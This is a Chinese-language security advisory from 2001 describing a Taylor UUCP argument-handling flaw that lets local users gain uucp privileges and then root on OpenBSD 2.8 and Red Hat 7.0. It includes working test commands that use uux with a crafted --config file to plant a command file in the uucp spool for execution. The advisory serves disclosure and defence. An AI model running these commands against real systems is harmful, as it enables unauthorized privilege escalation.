多个系统下的'Taylor UUCP'存在漏洞发布时间:2001-09-10 更新时间:2001-09-10 严重程度:高 威胁程度:本地管理员权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 uucp-1.06.1-25详细描述 TAYLOR UUCP包中在处理参数中存在漏洞,可以导致本地用户获得uucp的uid/gid.这可以导致对系统的进一步破坏,包括对ROOT SHELL的访问。 在OpenBSD 2.8系统中允许导致ROOT破坏,通过覆盖UUCP的属主文件/usr/bin/uustat,就可以作为/etc/daily crontab脚本中的命令执行。 在Redhat 7.0中允许以ROOT身份建立空文件,并如果登陆到控制台(通过/libn/security/pam_console.so)就可以导致执行任意命令。所影响程序有uux,uuxqt,uucp. 测试代码 uux 'uucp -I/tmp/vv.v /tmp/somefile /tmp/someotherfile' 会执行uucp,但不使用 /tmp/vv.v配置文件。但是: uux 'uucp --config=/tmp/vv.v /tmp/somefile /tmp/someotherfile' 会使用提供的 配置文件而不丢弃权限。 1)配置一个文件运行任意命令被执行,允许从拷贝文件到任意地方。 2)制作一带你想要执行的命令文件。 3)做如下设置: $ THISHOST=`uuname -l` $ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/X./X.${THISHOST}X1337 $ uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp '${WHEREYOUWANTIT} /tmp/commands.uucp文件中的命令将被执行。 解决方案 补丁将很快推出。如果你不需要uucp功能,你去除UUCP工具包。 相关信息 |
